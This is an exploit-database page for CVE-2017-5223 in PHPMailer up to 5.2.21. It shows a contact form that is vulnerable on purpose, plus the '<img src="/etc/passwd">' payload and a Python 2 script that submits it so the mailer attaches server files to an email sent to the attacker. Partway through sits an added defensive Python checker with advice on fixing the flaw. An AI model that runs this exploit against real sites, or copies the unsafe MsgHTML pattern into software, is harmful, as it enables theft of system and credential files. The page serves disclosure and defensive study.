PHPMailer 5.2.21 Local File Disclosure Exploit

26 Oct 2017 00:00:00 | Reported by Yongxiang Li | Type: zdt | Source: 0day.today | 205 views

PHPMailer 5.2.21 Local File Disclosure Exploit, CVE-2017-5223, Linux Debian 9, Contact Form Vulnerability, HTML Emai

Related

Reporter | Title | Published | Family
FreeBSD | phpmailer -- Remote Code Execution | 10 Jan 2017 00:00 | freebsd
ALT Linux | Security fix for the ALT Linux 9 package phpipam version 1.27.002-alt1 | 10 Jan 2017 00:00 | altlinux
CNVD | PHPMailer Information Disclosure Vulnerability | 12 Jan 2017 00:00 | cnvd
CNVD | PHPMailer Arbitrary File Read Vulnerability | 3 Feb 2017 00:00 | cnvd
Check Point Advisories | PHPMailer Local Information Disclosure (CVE-2017-5223) - Ver2 | 11 Apr 2018 00:00 | checkpoint_advisories
CVE | CVE-2017-5223 | 16 Jan 2017 06:00 | cve
Cvelist | CVE-2017-5223 | 16 Jan 2017 06:00 | cvelist
Debian | [SECURITY] [DLA 1591-1] libphp-phpmailer security update | 23 Nov 2018 09:41 | debian
Debian | [SECURITY] [DLA 817-1] libphp-phpmailer security update | 6 Feb 2017 09:00 | debian
Debian CVE | CVE-2017-5223 | 16 Jan 2017 06:00 | debiancve

# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223

// PoC //

It requires a contact form that sends HTML emails and allows sending a copy of the message to your own e-mail address.

// vulnerable form example //

<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
    $mail = new PHPMailer();
    $mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
    $address = "recipient@example.com"; // placeholder: the address is obscured on the source page
    $mail->AddAddress($address, "root");
    // "Send me a copy": the submitter's own address is added as CC
    if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
    $mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
    // Vulnerable call: the untrusted message is handed to MsgHTML() as HTML
    $mail->MsgHTML($_POST["your-message"]);
    if (!$mail->Send()) echo "Error: " . $mail->ErrorInfo; else echo "Sent!";
}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span></p>
<p><input type="submit" value="submit" /></p>
</form>

// exploit //

Put <img src="/etc/passwd"> in the message (or other file to disclose).
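A defensive check for the form input described above, as an added Python 3 example that is not part of the original exploit write-up: it flags src/background references in a submitted message that point at a local path rather than a URL. The matching pattern is an assumption that approximates how MsgHTML() picks up image references; the function names and the sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: approximates how PHPMailer <= 5.2.21 MsgHTML() finds image
# references in the message (src= or background= followed by a quote).
ATTR_RE = re.compile(r"""(?:src|background)\s*=\s*["']([^"']*)""", re.I)
# Values that are not read from the mail server's filesystem.
NON_LOCAL_RE = re.compile(r"^(?:cid:|data:|[a-z][a-z0-9+.-]*://)", re.I)


def local_file_refs(message_html):
    """Return src/background values that point at a local path."""
    return [value for value in ATTR_RE.findall(message_html)
            if value and not NON_LOCAL_RE.match(value)]


def review_submission(form_body, field="your-message"):
    """Check one urlencoded POST body; field name as in the form above."""
    fields = parse_qs(form_body)
    return local_file_refs(" ".join(fields.get(field, [])))


# Constructed request bodies for illustration (not captured traffic).
SAMPLES = [
    urlencode({"your-name": "A", "your-email": "a@example.com", "cc": "yes",
               "your-message": '<img src="/etc/passwd">'}),
    urlencode({"your-name": "B", "your-email": "b@example.com",
               "your-message": '<img src="https://example.com/logo.png">'}),
    urlencode({"your-name": "C", "your-email": "c@example.com", "cc": "yes",
               "your-message": "<body background='/etc/passwd'>"
                               '<img src="cid:logo">'}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        hits = review_submission(body)
        print("BLOCK" if hits else "ok", hits)
```

Input filtering of this kind is a stopgap for forms that must accept HTML; the write-up lists PHPMailer <= 5.2.21 as affected, so moving past that version and not passing untrusted input to MsgHTML() addresses the cause.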

// python code //

#!/usr/bin/python
import urllib
import urllib2
 
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
 
url = 'http://localhost/contact.php'
email = 'user@example.com'  # placeholder: the address is obscured on the source page
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html

#  0day.today [2018-02-16]  #

Vulners AI Score: 6.1 (Medium risk) | EPSS: 0.02143